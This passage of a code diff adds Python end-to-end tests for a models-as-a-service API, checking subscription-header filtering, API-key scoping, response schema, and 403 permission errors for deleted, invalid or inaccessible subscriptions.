+        finally:
+            _delete_cr("maassubscription", sub1_name, namespace=maas_ns)
+            _delete_cr("maassubscription", sub2_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth1_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth2_name, namespace=maas_ns)
+            _delete_sa(sa_name, namespace=sa_ns)
+            _wait_reconcile()
+
+    def test_user_token_with_subscription_header_filters(self):
+        """
+        Test: User token with X-MaaS-Subscription header filters to that subscription.
+
+        User tokens can optionally provide X-MaaS-Subscription to filter results
+        to a specific subscription (similar to API key behavior).
+
+        Expected: HTTP 200 with models from only the specified subscription.
+        """
+        log.info("Test: User token with X-MaaS-Subscription header filters models")
+
+        ns = _ns()
+        auth_policy_name = "e2e-user-token-filter-auth"
+        subscription_name = "e2e-user-token-filter-sub"
+        sa_name = "e2e-user-token-filter-sa"
+
+        try:
+            # Create service account and token
+            oc_token = _create_sa_token(sa_name, namespace=ns)
+            sa_user = _sa_to_user(sa_name, namespace=ns)
+
+            # Create test resources
+            _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user])
+            _create_test_subscription(subscription_name, MODEL_REF, users=[sa_user])
+
+            _wait_reconcile()
+
+            # Query with X-MaaS-Subscription header to filter
+            log.info(f"Querying /v1/models with X-MaaS-Subscription: {subscription_name}")
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {oc_token}",
+                    "X-MaaS-Subscription": subscription_name,
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200, \
+                f"Expected 200 for user token with subscription header, got {r.status_code}: {r.text}"
+
+            data = r.json()
+            models = data.get("data") or []
+
+            # Validate models are filtered to the specified subscription
+            for model in models:
+                assert "subscriptions" in model, f"Model {model.get('id')} missing 'subscriptions' field"
+                subscription_names = [s["name"] for s in model["subscriptions"]]
+                assert subscription_name in subscription_names, \
+                    f"Model {model.get('id')} should be in subscription {subscription_name}, got {subscription_names}"
+
+            log.info(f"✅ User token with X-MaaS-Subscription filtered to {len(models)} models")
+
+        finally:
+            _delete_cr("maassubscription", subscription_name, namespace=ns)
+            _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns)
+            _delete_sa(sa_name, namespace=ns)
+            _wait_reconcile()
+
+    def test_empty_model_list(self):
+        """
+        Test 9: Empty model list should return [] not null.
+
+        Creates a subscription pointing to UNCONFIGURED_MODEL_REF which has no
+        auth policy. The SA has access to the subscription, but when probing the
+        model endpoint, Authorino returns 403 (no auth policy = no access).
+
+        This validates that FilterModelsByAccess returns [] (not null) when no
+        models are accessible.
+        """
+        log.info("Test 9: Empty model list returns empty array")
+
+        sa_name = "e2e-empty-models-sa"
+        sa_ns = "default"
+        maas_ns = _ns()
+        subscription_name = "e2e-empty-models-subscription"
+
+        try:
+            # Create SA
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Create subscription pointing to unconfigured model (has no auth policy)
+            log.info(f"Creating subscription with {UNCONFIGURED_MODEL_REF} (no auth policy = no access)")
+            _create_test_subscription(subscription_name, UNCONFIGURED_MODEL_REF, users=[sa_user])
+
+            # Create API key bound to test subscription
+            api_key = _create_api_key(sa_token, name=f"{sa_name}-key", subscription=subscription_name)
+
+            _wait_reconcile()
+
+            # Query /v1/models - should return empty list (model has no auth policy)
+            url = f"{_maas_api_url()}/v1/models"
+            r = requests.get(
+                url,
+                headers={
+                    "Authorization": f"Bearer {api_key}",
+                    "x-maas-subscription": subscription_name,
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            # Should get 200 even with no models
+            assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}"
+
+            data = r.json()
+            assert data.get("object") == "list", f"Expected object='list', got {data.get('object')}"
+
+            assert "data" in data, "Response missing 'data' field"
+            models = data["data"]
+
+            # The critical assertion: data must be an array, never null
+            assert models is not None, "'data' field must not be null (should be [] for empty)"
+
+            assert isinstance(models, list), \
+                f"data must be a list, got {type(models).__name__}"
+
+            # Verify it's actually empty (unconfigured model has no auth policy)
+            assert len(models) == 0, \
+                f"Expected empty list (unconfigured model has no auth policy), got {len(models)} models: {models}"
+
+            log.info(f"✅ Empty model list → {r.status_code} with data=[] (array, not null)")
+
+        finally:
+            _delete_cr("maassubscription", subscription_name, namespace=maas_ns)
+            _delete_sa(sa_name, namespace=sa_ns)
+
+    def test_response_schema_matches_openapi(self):
+        """
+        Test 10: Response structure matches OpenAPI schema.
+
+        Validates all required fields and types match the API specification.
+        """
+        log.info("Test 9: Response schema matches OpenAPI spec")
+
+        sa_name = "e2e-models-schema-test-sa"
+        sa_ns = "default"
+        api_key = None
+
+        try:
+            # Create SA and API key
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+
+            api_key_response = requests.post(
+                f"{_maas_api_url()}/v1/api-keys",
+                headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"},
+                json={"name": "e2e-schema-test-key"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert api_key_response.status_code in (200, 201)
+            api_key = api_key_response.json().get("key")
+
+            _wait_reconcile()
+
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={"Authorization": f"Bearer {api_key}"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200
+            data = r.json()
+
+            # Validate top-level structure
+            assert "object" in data, "Response missing 'object' field"
+            assert data["object"] == "list", f"Expected object='list', got {data['object']}"
+            assert "data" in data, "Response missing 'data' field"
+            assert data["data"] is not None, "'data' field must not be null"
+
+            models = data["data"]
+            assert isinstance(models, list), f"'data' must be an array, got {type(models).__name__}"
+
+            # Validate each model matches schema
+            for model in models:
+                # Required fields per OpenAPI spec
+                assert "id" in model, f"Model missing required field 'id': {model}"
+                assert "object" in model, f"Model missing required field 'object': {model}"
+                assert "created" in model, f"Model missing required field 'created': {model}"
+                assert "owned_by" in model, f"Model missing required field 'owned_by': {model}"
+                assert "ready" in model, f"Model missing required field 'ready': {model}"
+
+                # Validate types
+                assert isinstance(model["id"], str), f"'id' must be string, got {type(model['id'])}"
+                assert isinstance(model["object"], str), f"'object' must be string"
+                assert model["object"] == "model", f"'object' must be 'model', got {model['object']}"
+                assert isinstance(model["created"], int), f"'created' must be integer"
+                assert isinstance(model["owned_by"], str), f"'owned_by' must be string"
+                assert isinstance(model["ready"], bool), f"'ready' must be boolean"
+
+                # Optional fields validation
+                if "url" in model:
+                    assert isinstance(model["url"], str), "'url' must be string if present"
+
+            log.info(f"✅ Response schema matches OpenAPI → validated {len(models)} model(s)")
+
+        finally:
+            _delete_sa(sa_name, namespace=sa_ns)
+
+    def test_model_metadata_preserved(self):
+        """
+        Test 11: Model metadata is correctly preserved.
+
+        Validates that url, ready, created, owned_by fields are accurate.
+        """
+        log.info("Test 10: Model metadata preserved")
+
+        sa_name = "e2e-models-metadata-sa"
+        sa_ns = "default"
+        api_key = None
+
+        try:
+            # Create SA and API key
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+
+            api_key_response = requests.post(
+                f"{_maas_api_url()}/v1/api-keys",
+                headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"},
+                json={"name": "e2e-metadata-test-key"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert api_key_response.status_code in (200, 201)
+            api_key = api_key_response.json().get("key")
+
+            _wait_reconcile()
+
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={"Authorization": f"Bearer {api_key}"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200
+            models = r.json().get("data") or []
+
+            for model in models:
+                # Verify metadata is present and reasonable
+                assert model["created"] > 0, f"'created' timestamp should be positive: {model['created']}"
+
+                assert model["owned_by"], f"'owned_by' should not be empty: {model}"
+
+                assert isinstance(model["ready"], bool), f"'ready' must be boolean: {model['ready']}"
+
+                # If URL is present, verify it's well-formed
+                if "url" in model and model["url"]:
+                    assert model["url"].startswith("http"), \
+                        f"URL should start with http: {model['url']}"
+                    # URL should contain the model ID
+                    # (though exact format may vary)
+
+                # Verify id is not empty
+                assert model["id"], f"Model ID should not be empty: {model}"
+
+            log.info(f"✅ Model metadata preserved → validated {len(models)} model(s)")
+
+        finally:
+            _delete_sa(sa_name, namespace=sa_ns)
+
+    def test_api_key_scoped_to_subscription(self):
+        """
+        Test: API key returns only models from its bound subscription.
+
+        API keys are scoped to a specific subscription at mint time. The gateway
+        automatically injects X-MaaS-Subscription from the key's subscription.
+
+        Expected: HTTP 200 with models only from the key's subscription, even if
+        the user has access to multiple subscriptions.
+        """
+        ns = _ns()
+        auth_policy_name = "e2e-api-key-scoped-auth"
+        subscription_name = "e2e-api-key-scoped-sub"
+        sa_name = "e2e-api-key-scoped-sa"
+        api_key = None
+
+        try:
+            # Create service account and token
+            oc_token = _create_sa_token(sa_name, namespace=ns)
+            sa_user = _sa_to_user(sa_name, namespace=ns)
+
+            # Create test resources
+            _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user])
+            _create_test_subscription(subscription_name, MODEL_REF, users=[sa_user])
+
+            # Create API key bound to subscription_name
+            api_key = _create_api_key(oc_token, name=f"{sa_name}-key", subscription=subscription_name)
+
+            _wait_reconcile()
+
+            # Query with API key (no manual headers)
+            log.info(f"Querying /v1/models with API key bound to {subscription_name}")
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {api_key}",
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200, \
+                f"Expected 200 for API key request, got {r.status_code}: {r.text}"
+
+            data = r.json()
+            models = data.get("data") or []
+
+            # Validate models are from the key's subscription
+            log.info(f"API key returned {len(models)} models")
+            for model in models:
+                assert "subscriptions" in model, f"Model {model.get('id')} missing 'subscriptions' field"
+                subscription_names = [s["name"] for s in model["subscriptions"]]
+                # Models should be associated with the key's subscription
+                assert subscription_name in subscription_names, \
+                    f"Model {model.get('id')} should be in subscription {subscription_name}"
+
+            log.info(f"✅ API key scoped to {subscription_name} returned {len(models)} models")
+
+        finally:
+            _delete_cr("maassubscription", subscription_name, namespace=ns)
+            _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns)
+            _delete_sa(sa_name, namespace=ns)
+            _wait_reconcile()
+
+    def test_api_key_with_deleted_subscription_403(self):
+        """
+        Test: API key bound to a subscription that was deleted after key creation.
+
+        This tests an edge case where an API key was minted with a subscription,
+        but that subscription is later deleted. The gateway injects X-MaaS-Subscription
+        from the key, but the subscription no longer exists.
+
+        Expected: HTTP 403 with error type: permission_error
+        """
+        ns = _ns()
+        auth_policy_name = "e2e-api-key-deleted-sub-auth"
+        subscription_name = "e2e-api-key-deleted-sub"
+        sa_name = "e2e-api-key-deleted-sub-sa"
+        api_key = None
+
+        try:
+            # Create service account and token
+            oc_token = _create_sa_token(sa_name, namespace=ns)
+            sa_user = _sa_to_user(sa_name, namespace=ns)
+
+            # Create test resources
+            _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user])
+            _create_test_subscription(subscription_name, MODEL_REF, users=[sa_user])
+
+            # Create API key bound to subscription
+            api_key = _create_api_key(oc_token, name=f"{sa_name}-key", subscription=subscription_name)
+
+            _wait_reconcile()
+
+            # Delete the subscription (simulating deletion after key creation)
+            log.info(f"Deleting subscription {subscription_name} after API key creation")
+            _delete_cr("maassubscription", subscription_name, namespace=ns)
+            _wait_reconcile()
+
+            # Query with API key (gateway injects deleted subscription name)
+            log.info("Querying /v1/models with API key bound to deleted subscription")
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {api_key}",
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            # Should return 403 because subscription doesn't exist
+            assert r.status_code == 403, \
+                f"Expected 403 for API key with deleted subscription, got {r.status_code}: {r.text}"
+
+            data = r.json()
+            assert "error" in data, "Response missing 'error' field"
+            error = data["error"]
+            assert error.get("type") == "permission_error", \
+                f"Expected error type 'permission_error', got {error.get('type')}"
+
+            log.info(f"✅ API key with deleted subscription → {r.status_code} (permission_error)")
+
+        finally:
+            # subscription_name already deleted
+            _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns)
+            _delete_sa(sa_name, namespace=ns)
+            _wait_reconcile()
+
+    def test_api_key_with_inaccessible_subscription_403(self):
+        """
+        Test: API key bound to a subscription the user no longer has access to.
+
+        This tests an edge case where an API key was minted when the user had access
+        to a subscription, but later the user's group membership changed and they
+        lost access. The key still has the subscription bound.
+
+        Expected: HTTP 403 with error type: permission_error
+        """
+        ns = _ns()
+        auth_policy_name = "e2e-api-key-no-access-auth"
+        subscription_name = "e2e-api-key-no-access-sub"
+        sa_user = "e2e-api-key-user-sa"
+        sa_other = "e2e-api-key-other-sa"
+
+        try:
+            # Create two service accounts
+            oc_token_user = _create_sa_token(sa_user, namespace=ns)
+            _ = _create_sa_token(sa_other, namespace=ns)
+
+            user_principal = _sa_to_user(sa_user, namespace=ns)
+            other_principal = _sa_to_user(sa_other, namespace=ns)
+
+            # Create subscription accessible only to "other" user
+            _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[user_principal, other_principal])
+            _create_test_subscription(subscription_name, MODEL_REF, users=[other_principal])
+
+            _wait_reconcile()
+
+            # User tries to query with their token but specifying the other user's subscription
+            # This simulates what would happen if an API key was bound to a subscription
+            # the user doesn't have access to
+            log.info("Querying /v1/models with user token and inaccessible subscription")
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {oc_token_user}",
+                    "X-MaaS-Subscription": subscription_name,
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            # Should return 403 because user doesn't have access to the subscription
+            assert r.status_code == 403, \
+                f"Expected 403 for subscription without access, got {r.status_code}: {r.text}"
+
+            data = r.json()
+            assert "error" in data, "Response missing 'error' field"
+            error = data["error"]
+            assert error.get("type") == "permission_error", \
+                f"Expected error type 'permission_error', got {error.get('type')}"
+
+            log.info(f"✅ API key/user with inaccessible subscription → {r.status_code} (permission_error)")
+
+        finally:
+            _delete_cr("maassubscription", subscription_name, namespace=ns)
+            _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns)
+            _delete_sa(sa_user, namespace=ns)
+            _delete_sa(sa_other, namespace=ns)
+            _wait_reconcile()
+
+    def test_invalid_subscription_header_403(self):
+        """
+        Test: User with valid subscriptions but providing an invalid/non-existent
+        subscription in the header gets 403.
+
+        Expected: HTTP 403 with error type: permission_error and message:
+        "requested subscription not found".
+        """
+        ns = _ns()
+        auth_policy_name = "e2e-models-invalid-sub-auth"
+        subscription_name = "e2e-models-valid-sub"
+        sa_name = "e2e-models-invalid-sub-sa"
+
+        try:
+            # Create service account and get OC token for maas-api
+            oc_token = _create_sa_token(sa_name, namespace=ns)
+            sa_user = _sa_to_user(sa_name, namespace=ns)
+
+            # Create test resources - user has valid subscription
+            _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user])
+            _create_test_subscription(subscription_name, MODEL_REF, users=[sa_user])
+
+            _wait_reconcile()
+
+            # Test: GET /v1/models WITH non-existent subscription header
+            # Expected: 403 with "subscription not found" error
+            invalid_sub = "nonexistent-subscription-xyz"
+            log.info(f"Testing: GET /v1/models with invalid subscription header: {invalid_sub}")
+            url = f"{_maas_api_url()}/v1/models"
+            r = requests.get(
+                url,
+                headers={
+                    "Authorization": f"Bearer {oc_token}",
+                    "x-maas-subscription": invalid_sub,
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 403, f"Expected 403 for invalid subscription, got {r.status_code}: {r.text}"
+
+            # Validate error response structure
+            data = r.json()
+            assert "error" in data, "Response missing 'error' field"
+            error = data["error"]
+            assert error.get("type") == "permission_error", f"Expected error type 'permission_error', got {error.get('type')}"
+            assert "message" in error, "Error missing 'message' field"
+
+            # Message should indicate subscription not found
+            message = error["message"].lower()
+            assert "not found" in message or "subscription" in message, \
+                f"Error message doesn't indicate subscription not found: {error['message']}"
+
+            log.info(f"✅ Invalid subscription header → {r.status_code} (permission_error)")
+
+        finally:
+            _delete_cr("maassubscription", subscription_name, namespace=ns)
+            _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns)
+            _delete_sa(sa_name, namespace=ns)
+            _wait_reconcile()
+
+    def test_access_denied_to_subscription_403(self):
+        """
+        Test: Subscription exists but user is not in its MaaSAuthPolicy owner list.
+        User requests that subscription via header.
+
+        Expected: HTTP 403 with error type: permission_error and message:
+        "access denied to requested subscription".
+        """
+        ns = _ns()
+        auth_policy_name = "e2e-models-access-denied-auth"
+        user_subscription = "e2e-models-user-sub"
+        other_subscription = "e2e-models-other-sub"
+        sa_user = "e2e-models-user-sa"
+        sa_other = "e2e-models-other-sa"
+
+        try:
+            # Create two service accounts
+            oc_token_user = _create_sa_token(sa_user, namespace=ns)
+            _ = _create_sa_token(sa_other, namespace=ns)  # SA creation only - token unused
+
+            user_principal = _sa_to_user(sa_user, namespace=ns)
+            other_principal = _sa_to_user(sa_other, namespace=ns)
+
+            # Create test resources
+            # Both users have access to the model via auth policy
+            _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[user_principal, other_principal])
+            # Each user has their own subscription
+            _create_test_subscription(user_subscription, MODEL_REF, users=[user_principal])
+            _create_test_subscription(other_subscription, MODEL_REF, users=[other_principal])
+
+            _wait_reconcile()
+
+            # Test: User tries to use another user's subscription in header
+            # Expected: 403 with "access denied" error
+            log.info(f"Testing: GET /v1/models with inaccessible subscription: {other_subscription}")
+            url = f"{_maas_api_url()}/v1/models"
+            r = requests.get(
+                url,
+                headers={
+                    "Authorization": f"Bearer {oc_token_user}",
+                    "x-maas-subscription": other_subscription,
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 403, f"Expected 403 for inaccessible subscription, got {r.status_code}: {r.text}"
+
+            # Validate error response structure
+            data = r.json()
+            assert "error" in data, "Response missing 'error' field"
+            error = data["error"]
+            assert error.get("type") == "permission_error", f"Expected error type 'permission_error', got {error.get('type')}"
+            assert "message" in error, "Error missing 'message' field"
+
+            # Security: Bare subscription names return "not found" to avoid leaking namespace info.
+            # This prevents enumeration of subscriptions across namespaces.
+            message = error["message"].lower()
+            assert "denied" in message or "access" in message or "not found" in message, \
+                f"Error message should indicate permission issue: {error['message']}"
+
+            log.info(f"✅ Access denied to subscription → {r.status_code} (permission_error)")
+
+        finally:
+            _delete_cr("maassubscription", user_subscription, namespace=ns)
+            _delete_cr("maassubscription", other_subscription, namespace=ns)
+            _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns)
+            _delete_sa(sa_user, namespace=ns)
+            _delete_sa(sa_other, namespace=ns)
+            _wait_reconcile()
+
+    def test_api_key_ignores_subscription_header(self):
+        """
+        Test: API key ignores x-maas-subscription header and uses bound subscription.
+
+        Creates an API key bound to one subscription, then sends request with header
+        pointing to a different subscription. The API key should ignore the header
+        and return models from its bound subscription.
+
+        Expected: HTTP 200 with models from the key's bound subscription (header ignored).
+        """
+        sa_name = "e2e-api-key-ignores-header-sa"
+        sa_ns = "default"
+        maas_ns = _ns()
+        sub1_name = "e2e-ignore-header-sub1"
+        sub2_name = "e2e-ignore-header-sub2"
+        auth1_name = "e2e-ignore-header-auth1"
+        auth2_name = "e2e-ignore-header-auth2"
+        api_key = None
+
+        try:
+            # Create SA
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Create two subscriptions with different models
+            log.info(f"Creating subscription 1 with {DISTINCT_MODEL_REF}")
+            _create_test_auth_policy(auth1_name, DISTINCT_MODEL_REF, users=[sa_user])
+            _create_test_subscription(sub1_name, DISTINCT_MODEL_REF, users=[sa_user], priority=10)
+
+            log.info(f"Creating subscription 2 with {DISTINCT_MODEL_2_REF}")
+            _create_test_auth_policy(auth2_name, DISTINCT_MODEL_2_REF, users=[sa_user])
+            _create_test_subscription(sub2_name, DISTINCT_MODEL_2_REF, users=[sa_user], priority=5)
+
+            _wait_reconcile()
+
+            # Create API key - will be bound to highest priority subscription (sub1)
+            log.info(f"Creating API key (will bind to {sub1_name} - highest priority)")
+            api_key = _create_api_key(sa_token, name=f"{sa_name}-key")
+
+            _wait_reconcile()
+
+            # Test: Send request with header pointing to sub2, but key is bound to sub1
+            log.info(f"Querying /v1/models with API key bound to {sub1_name} but header={sub2_name}")
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {api_key}",
+                    "x-maas-subscription": sub2_name,  # Try to override with header
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}"
+            data = r.json()
+            models = data.get("data") or []
+
+            # Verify we got models from sub1 (not sub2 - header ignored)
+            assert len(models) > 0, "Expected at least one model"
+
+            for model in models:
+                model_id = model.get("id")
+                subscriptions = [s["name"] for s in model.get("subscriptions", [])]
+
+                # Models should be from sub1 (bound subscription), not sub2 (header)
+                assert sub1_name in subscriptions, \
+                    f"Model {model_id} should be in {sub1_name} (bound), not {sub2_name} (header). Got: {subscriptions}"
+
+                # Should NOT find sub2's model (DISTINCT_MODEL_2_ID)
+                assert model_id != DISTINCT_MODEL_2_ID, \
+                    f"Should not see {DISTINCT_MODEL_2_ID} from {sub2_name} (header ignored)"
+
+            log.info(f"✅ API key ignored x-maas-subscription header → returned {len(models)} model(s) from bound subscription")
+
+        finally:
+            _delete_cr("maassubscription", sub1_name, namespace=maas_ns)
+            _delete_cr("maassubscription", sub2_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth1_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth2_name, namespace=maas_ns)
+            _delete_sa(sa_name, namespace=sa_ns)
+            _wait_reconcile()
+
+    def test_multiple_api_keys_different_subscriptions(self):
+        """
+        Test: Multiple API keys each bound to different subscriptions.
+
+        Creates two API keys from the same user, each explicitly bound to a different
+        subscription. Verifies each key returns only its bound subscription's models.
+
+        Expected: Each API key returns models only from its bound subscription.
+        """
+        sa_name = "e2e-multi-keys-sa"
+        sa_ns = "default"
+        maas_ns = _ns()
+        sub1_name = "e2e-multi-keys-sub1"
+        sub2_name = "e2e-multi-keys-sub2"
+        auth1_name = "e2e-multi-keys-auth1"
+        auth2_name = "e2e-multi-keys-auth2"
+        api_key1 = None
+        api_key2 = None
+
+        try:
+            # Create SA
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Create two subscriptions with different models
+            log.info(f"Creating subscription 1 with {DISTINCT_MODEL_REF}")
+            _create_test_auth_policy(auth1_name, DISTINCT_MODEL_REF, users=[sa_user])
+            _create_test_subscription(sub1_name, DISTINCT_MODEL_REF, users=[sa_user])
+
+            log.info(f"Creating subscription 2 with {DISTINCT_MODEL_2_REF}")
+            _create_test_auth_policy(auth2_name, DISTINCT_MODEL_2_REF, users=[sa_user])
+            _create_test_subscription(sub2_name, DISTINCT_MODEL_2_REF, users=[sa_user])
+
+            _wait_reconcile()
+
+            # Create two API keys, each bound to a different subscription
+            log.info(f"Creating API key 1 bound to {sub1_name}")
+            api_key1_response = requests.post(
+                f"{_maas_api_url()}/v1/api-keys",
+                headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"},
+                json={"name": "key1", "subscription": sub1_name},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert api_key1_response.status_code in (200, 201)
+            api_key1 = api_key1_response.json().get("key")
+            bound_sub1 = api_key1_response.json().get("subscription")
+            assert bound_sub1 == sub1_name, f"Key 1 should be bound to {sub1_name}, got {bound_sub1}"
+
+            log.info(f"Creating API key 2 bound to {sub2_name}")
+            api_key2_response = requests.post(
+                f"{_maas_api_url()}/v1/api-keys",
+                headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"},
+                json={"name": "key2", "subscription": sub2_name},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert api_key2_response.status_code in (200, 201)
+            api_key2 = api_key2_response.json().get("key")
+            bound_sub2 = api_key2_response.json().get("subscription")
+            assert bound_sub2 == sub2_name, f"Key 2 should be bound to {sub2_name}, got {bound_sub2}"
+
+            _wait_reconcile()
+
+            # Test key1 - should return models from sub1 only
+            log.info(f"Testing API key 1 (bound to {sub1_name})")
+            r1 = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={"Authorization": f"Bearer {api_key1}"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert r1.status_code == 200, f"Expected 200 for key1, got {r1.status_code}: {r1.text}"
+            models1 = r1.json().get("data") or []
+            model_ids1 = {m["id"] for m in models1}
+
+            assert DISTINCT_MODEL_ID in model_ids1, f"Key1 should see {DISTINCT_MODEL_ID} from {sub1_name}"
+            assert DISTINCT_MODEL_2_ID not in model_ids1, f"Key1 should NOT see {DISTINCT_MODEL_2_ID} from {sub2_name}"
+
+            # Test key2 - should return models from sub2 only
+            log.info(f"Testing API key 2 (bound to {sub2_name})")
+            r2 = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={"Authorization": f"Bearer {api_key2}"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert r2.status_code == 200, f"Expected 200 for key2, got {r2.status_code}: {r2.text}"
+            models2 = r2.json().get("data") or []
+            model_ids2 = {m["id"] for m in models2}
+
+            assert DISTINCT_MODEL_2_ID in model_ids2, f"Key2 should see {DISTINCT_MODEL_2_ID} from {sub2_name}"
+            assert DISTINCT_MODEL_ID not in model_ids2, f"Key2 should NOT see {DISTINCT_MODEL_ID} from {sub1_name}"
+
+            log.info(f"✅ Multiple API keys with different bindings → Key1: {len(models1)} models, Key2: {len(models2)} models")
+
+        finally:
+            _delete_cr("maassubscription", sub1_name, namespace=maas_ns)
+            _delete_cr("maassubscription", sub2_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth1_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth2_name, namespace=maas_ns)
+            _delete_sa(sa_name, namespace=sa_ns)
+            _wait_reconcile()
+
+    def test_service_account_token_multiple_subs_no_header(self):
+        """
+        Test: K8s token with access to multiple subscriptions returns all models (no header).
+
+        Creates a service account with access to two subscriptions (via group and user).
+        When querying without x-maas-subscription header, should return models from
+        all accessible subscriptions.
+
+        Expected: HTTP 200 with models from both subscriptions.
+        """
+        sa_name = "e2e-sa-multi-subs-no-header"
+        sa_ns = "default"
+        maas_ns = _ns()
+        sub1_name = "e2e-sa-multi-no-hdr-sub1"
+        sub2_name = "e2e-sa-multi-no-hdr-sub2"
+        auth1_name = "e2e-sa-multi-no-hdr-auth1"
+        auth2_name = "e2e-sa-multi-no-hdr-auth2"
+
+        try:
+            # Create SA
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Create two subscriptions with different models
+            # Sub1: Access via system:authenticated group
+            log.info(f"Creating subscription 1 with {DISTINCT_MODEL_REF} (group: system:authenticated)")
+            _create_test_auth_policy(auth1_name, DISTINCT_MODEL_REF, groups=["system:authenticated"])
+            _create_test_subscription(sub1_name, DISTINCT_MODEL_REF, groups=["system:authenticated"])
+
+            # Sub2: Access via specific user
+            log.info(f"Creating subscription 2 with {DISTINCT_MODEL_2_REF} (user: {sa_user})")
+            _create_test_auth_policy(auth2_name, DISTINCT_MODEL_2_REF, users=[sa_user])
+            _create_test_subscription(sub2_name, DISTINCT_MODEL_2_REF, users=[sa_user])
+
+            _wait_reconcile()
+
+            # Query with K8s token (no header)
+            log.info("Querying /v1/models with K8s token (no header) - should return models from both subscriptions")
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={"Authorization": f"Bearer {sa_token}"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}"
+            data = r.json()
+            models = data.get("data") or []
+            model_ids = {m["id"] for m in models}
+
+            # Should see models from BOTH subscriptions
+            assert DISTINCT_MODEL_ID in model_ids, \
+                f"Should see {DISTINCT_MODEL_ID} from {sub1_name} (group access)"
+            assert DISTINCT_MODEL_2_ID in model_ids, \
+                f"Should see {DISTINCT_MODEL_2_ID} from {sub2_name} (user access)"
+
+            log.info(f"✅ K8s token with multiple subscriptions (no header) → {len(models)} models from both subscriptions")
+
+        finally:
+            _delete_cr("maassubscription", sub1_name, namespace=maas_ns)
+            _delete_cr("maassubscription", sub2_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth1_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth2_name, namespace=maas_ns)
+            _delete_sa(sa_name, namespace=sa_ns)
+            _wait_reconcile()
+
+    def test_service_account_token_multiple_subs_with_header(self):
+        """
+        Test: K8s token with access to multiple subscriptions filters by header.
+
+        Creates a service account with access to two subscriptions. When querying
+        with x-maas-subscription header, should return models from only the specified
+        subscription.
+
+        Expected: HTTP 200 with models from only the specified subscription.
+        """
+        sa_name = "e2e-sa-multi-subs-with-header"
+        sa_ns = "default"
+        maas_ns = _ns()
+        sub1_name = "e2e-sa-multi-hdr-sub1"
+        sub2_name = "e2e-sa-multi-hdr-sub2"
+        auth1_name = "e2e-sa-multi-hdr-auth1"
+        auth2_name = "e2e-sa-multi-hdr-auth2"
+
